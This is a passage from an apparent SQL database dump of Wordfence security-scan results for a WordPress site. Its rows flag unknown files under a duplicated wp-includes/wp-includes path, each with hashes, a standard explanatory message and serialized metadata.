More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/default-widgets.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26941,1631424886,1631424886,'new','knownfile',75,'e88f280ed49d3567ad6f371775d80578','f4ad88cfe704f11083f5c7012a5cc427','Unknown file in WordPress core: wp-includes/wp-includes/deprecated.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/deprecated.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26942,1631424887,1631424887,'new','knownfile',75,'66f81e0b5804dc8470b2d03a37a60bd2','a764c0b72b04f6cb539473ac005b8af6','Unknown file in WordPress core: wp-includes/wp-includes/embed-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/embed-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26943,1631424887,1631424887,'new','knownfile',75,'7ad3257b61c9d0b86a54e115e31a60da','8e7744b4973b358ae852e86f1f8b423f','Unknown file in WordPress core: wp-includes/wp-includes/embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26944,1631424887,1631424887,'new','knownfile',75,'7659437bf31fbf08a6384cfdf25996a9','2cf0884644e0f6b12933b13d54dbb814','Unknown file in WordPress core: wp-includes/wp-includes/error-protection.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/error-protection.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26945,1631424887,1631424887,'new','knownfile',75,'d40ef568ec0deca9a1cc48cc729b168a','edc1637d9d69beafa177a9e26fa5053d','Unknown file in WordPress core: wp-includes/wp-includes/feed-atom-comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/feed-atom-comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26946,1631424887,1631424887,'new','knownfile',75,'eb7fab1d0b18164c1a1713d7fc308563','b9e7ac8d9aaa378cfd8fc175c22d26d4','Unknown file in WordPress core: wp-includes/wp-includes/feed-atom.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/feed-atom.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26947,1631424887,1631424887,'new','knownfile',75,'9502a14396b85c73e4b0ed6ce2b30a01','740f3964eb947cdc39a6e99da8c714a3','Unknown file in WordPress core: wp-includes/wp-includes/feed-rdf.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/feed-rdf.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26948,1631424887,1631424887,'new','knownfile',75,'f21442d4627eb4891554a76aa3c2bbd4','a6c797766a942208f46426858284654f','Unknown file in WordPress core: wp-includes/wp-includes/feed-rss.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/feed-rss.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26949,1631424888,1631424888,'new','knownfile',75,'57e4840c5adbdb24d017846da8b638dd','6b7dc1ac1ab27b8d6d5a1e1758871f7c','Unknown file in WordPress core: wp-includes/wp-includes/feed-rss2-comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/feed-rss2-comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26950,1631424888,1631424888,'new','knownfile',75,'6d5b239b18454692d0dd79bb8f9d2b2b','eb909104f8406d9f9e739b136d48fc33','Unknown file in WordPress core: wp-includes/wp-includes/feed-rss2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/feed-rss2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26951,1631424888,1631424888,'new','knownfile',75,'d41a32afd41f30bae8c45850077c71a2','1f99168e0ee8dda36ca212ff8f14a07e','Unknown file in WordPress core: wp-includes/wp-includes/feed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/feed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26952,1631424888,1631424888,'new','knownfile',75,'2d3c516584f398351b7514ae512eaa96','6180ad51bded40e3aea3e2960a4bfc8a','Unknown file in WordPress core: wp-includes/wp-includes/formatting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/formatting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26953,1631424888,1631424888,'new','knownfile',75,'6def27f74462697e6049acfaae2cba4f','1bcd54d462de136cf63f4c13886de6cf','Unknown file in WordPress core: wp-includes/wp-includes/functions.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/functions.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26954,1631424888,1631424888,'new','knownfile',75,'0a75ef0544398e81342ed5d3693af326','c9f8dedde0a03b76dbc3ddb2b1cfaa1c','Unknown file in WordPress core: wp-includes/wp-includes/functions.wp-scripts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/functions.wp-scripts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26955,1631424888,1631424888,'new','knownfile',75,'9a6987ee556e81a0644f7ab03d8d8cb8','a3407b95e4c4af2ad10e2d1261b2f6b2','Unknown file in WordPress core: wp-includes/wp-includes/functions.wp-styles.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/functions.wp-styles.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26956,1631424888,1631424888,'new','knownfile',75,'5819ad1c54698b9b011de081caac8eeb','970a44fc9efaf8f5bdd82d5fb5e74163','Unknown file in WordPress core: wp-includes/wp-includes/general-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/general-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26957,1631424888,1631424888,'new','knownfile',75,'c823ae0c558d8a95e98c211186681a6c','97cdf2d00ca759af715887880bf9f5eb','Unknown file in WordPress core: wp-includes/wp-includes/http.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/http.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26958,1631424888,1631424888,'new','knownfile',75,'93e7b26c7e607fa04a851c9be22b6093','e0c52bd1ef0f05ae7b4a686cd8044d5f','Unknown file in WordPress core: wp-includes/wp-includes/https-detection.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/https-detection.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26959,1631424888,1631424888,'new','knownfile',75,'c3ec9aae79a10c0db19fd91e0bce4942','74650ebeaac066f1a5470fae054270af','Unknown file in WordPress core: wp-includes/wp-includes/https-migration.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/https-migration.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26960,1631424888,1631424888,'new','knownfile',75,'0a89880fd477df6b6ce55871e02b3cf4','dccc5b322560a34360dc988a4d792749','Unknown file in WordPress core: wp-includes/wp-includes/images/admin-bar-sprite-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/images/admin-bar-sprite-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26961,1631424888,1631424888,'new','knownfile',75,'05b1081077706eb88e24770f7b17871a','ca599aa57d7d9f184011f080b6245bca','Unknown file in WordPress core: wp-includes/wp-includes/images/admin-bar-sprite.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/admin-bar-sprite.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26962,1631424888,1631424888,'new','knownfile',75,'50d106cafb9f883e571244b458cadb65','7d4a57eafd2a7af9c64db4575dcde0fe','Unknown file in WordPress core: wp-includes/wp-includes/images/arrow-pointer-blue-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/images/arrow-pointer-blue-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26963,1631424889,1631424889,'new','knownfile',75,'967bf3a2b57e7f0ca3d70e8d6a12992f','5bbe7be3d8f1bc9f056424a61bd8a11c','Unknown file in WordPress core: wp-includes/wp-includes/images/arrow-pointer-blue.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/images/arrow-pointer-blue.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26964,1631424889,1631424889,'new','knownfile',75,'2d78fd374e8a1115e482467b03ac7eb1','61e7e946cdc564ebea9d885633ae8a32','Unknown file in WordPress core: wp-includes/wp-includes/images/blank.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/images/blank.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26965,1631424889,1631424889,'new','knownfile',75,'588c3a290f8655cc7d80e70758d81612','2d63f83e56e874c5c5a429650cfebce2','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/archive.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/crystal/archive.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26966,1631424889,1631424889,'new','knownfile',75,'ec434c9dba33710118a0e20b919461b6','08b38c690bc0530f93ac15c59c2f13a2','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/audio.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/crystal/audio.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26967,1631424889,1631424889,'new','knownfile',75,'ce02307813608de9312d456d7059fa85','746921b236a90339dfde4fb45f65782c','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/code.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/images/crystal/code.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26968,1631424889,1631424889,'new','knownfile',75,'da70d587ab9fe48410af000aa1cc3c64','9a1fa68d2e9e72ab8531382d60eb2a60','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/default.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/crystal/default.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26969,1631424889,1631424889,'new','knownfile',75,'7a340ecb4609cb704fccc697e1793b19','b209b0349bcc927379238d1a4b2b7b8e','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/document.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/crystal/document.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26970,1631424889,1631424889,'new','knownfile',75,'63532a26d5918e4a10b5c0e31e1d16a8','aa52acca9dfde1c1b24bd1b5e7fc6669','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/interactive.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/images/crystal/interactive.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26971,1631424889,1631424889,'new','knownfile',75,'30be4624775aa5fcf2d2e4baaaee7603','98cf4e44f091ac48435ca836f9e2d08c','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/license.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/crystal/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26972,1631424889,1631424889,'new','knownfile',75,'13d18ea1ec18e482a9857caf12528d90','3c221cb15bb39134a9d5877fdbb46770','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/spreadsheet.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/images/crystal/spreadsheet.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26973,1631424889,1631424889,'new','knownfile',75,'b86b4af973a19231b401339cce5b7619','1f31a3d78b862014ee472e7abc08dc14','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/text.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/images/crystal/text.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26974,1631424889,1631424889,'new','knownfile',75,'a8c2ffe6e8e85783f5db41540bd7368e','01fcc960ee73763297d09d4f6002c89d','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/video.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/crystal/video.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26975,1631424889,1631424889,'new','knownfile',75,'85587d61d71f5feffa27219a6c98e4fa','8c3a05ad361c4a150e71346548a72ee7','Unknown file in WordPress core: wp-includes/wp-includes/images/down_arrow-2x.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/down_arrow-2x.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26976,1631424889,1631424889,'new','knownfile',75,'7f1087ff09a2a948669b9d87470b6d74','3315b08f593710fa09320cb41386ad30','Unknown file in WordPress core: wp-includes/wp-includes/images/down_arrow.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/down_arrow.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26977,1631424890,1631424890,'new','knownfile',75,'d04c3752c9e680a120f862a8dac09aa7','ce64dfd0d668d16503931d46a2f7306b','Unknown file in WordPress core: wp-includes/wp-includes/images/icon-pointer-flag-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/icon-pointer-flag-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26978,1631424890,1631424890,'new','knownfile',75,'705d01be6c08052a6af003d32f674321','a10192482290d1eb2ee2dedc8434c0a2','Unknown file in WordPress core: wp-includes/wp-includes/images/icon-pointer-flag.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/icon-pointer-flag.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26979,1631424890,1631424890,'new','knownfile',75,'9a0c99a85af977503c819f19adf709d0','4c0117bb251606c8e4f8d1d4980503a9','Unknown file in WordPress core: wp-includes/wp-includes/images/media/archive.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/media/archive.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26980,1631424890,1631424890,'new','knownfile',75,'635a9b54f3cd6daaf2d0aebde578362d','361e7338dfc1b0d75996cb78f8e8fc87','Unknown file in WordPress core: wp-includes/wp-includes/images/media/audio.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/images/media/audio.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26981,1631424890,1631424890,'new','knownfile',75,'b1bd8313257a076cee2398d3a0718171','ee4256b87b85fe0f1664b7a953c97982','Unknown file in WordPress core: wp-includes/wp-includes/images/media/code.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a 